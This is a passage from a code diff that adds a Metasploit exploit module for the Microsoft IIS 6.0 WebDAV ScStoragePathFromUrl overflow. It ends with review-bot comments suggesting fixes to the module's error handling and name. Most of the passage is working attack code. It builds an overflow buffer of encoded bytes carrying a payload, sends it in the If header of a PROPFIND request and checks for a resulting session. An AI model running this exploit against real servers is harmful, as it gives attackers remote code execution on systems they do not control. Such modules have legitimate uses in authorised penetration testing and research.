|| res.code != 207) + + xml = res.get_xml_document + url = URI.parse(xml.at("//a:response//a:href").text) + server_name = url.hostname + server_port = url.port + server_scheme = url.scheme + + http_host = "#{server_scheme}://#{server_name}:#{server_port}" + vprint_status("Using http_host #{http_host}") + + min_path_len.upto(max_path_len) do |path_len| + vprint_status("Trying path length of #{path_len}...") + + begin + buf1 = "<#{http_host}/" + buf1 << rand_text_alpha(114 - path_len) + buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac" + buf1 << ">" + buf1 << " (Not ) <#{http_host}/" + buf1 << rand_text_alpha(114 - path_len) + buf1 << 
"\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" + buf1 << payload.encoded + buf1 << ">" + + vprint_status("Sending payload") + res = send_request_raw( + 'method' => 'PROPFIND', + 'headers' => { + 'Content-Length' => 0, + 'If' => "#{buf1}" + }, + 'uri' => target_uri.path + ) + if res + vprint_status("Server returned status #{res.code}") + if res.code == 502 || res.code == 400 + next + elsif session_created? + return + else + vprint_status("Unknown Response: #{res.code}") + end + end + rescue ::Errno::ECONNRESET + vprint_status("got a connection reset") + next + end + end + end +end
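Review bot: `check` calls `res.headers['Server'].include?('IIS/6.0')` guarded only by `res &&`, so a response that carries no `Server` header (common behind a proxy that strips it) raises `NoMethodError` on nil instead of falling through to the `supports_webdav?` branches; `res.headers['Server'].to_s.include?('IIS/6.0')` keeps the intended logic. In `exploit`, `url = URI.parse(xml.at("//a:response//a:href").text)` likewise raises when the 207 body has no matching href, which the `fail_with(Failure::BadConfig, ...)` guard above it does not cover; `href = xml.at("//a:response//a:href")` followed by `fail_with(Failure::UnexpectedReply, "No href in PROPFIND response") unless href` gives the operator a real message instead of a backtrace. The `'Name'` value in `initialize` has a leading space, `' Microsoft IIS WebDav ScStoragePathFromUrl Overflow'`, which shows up in module listings and search output.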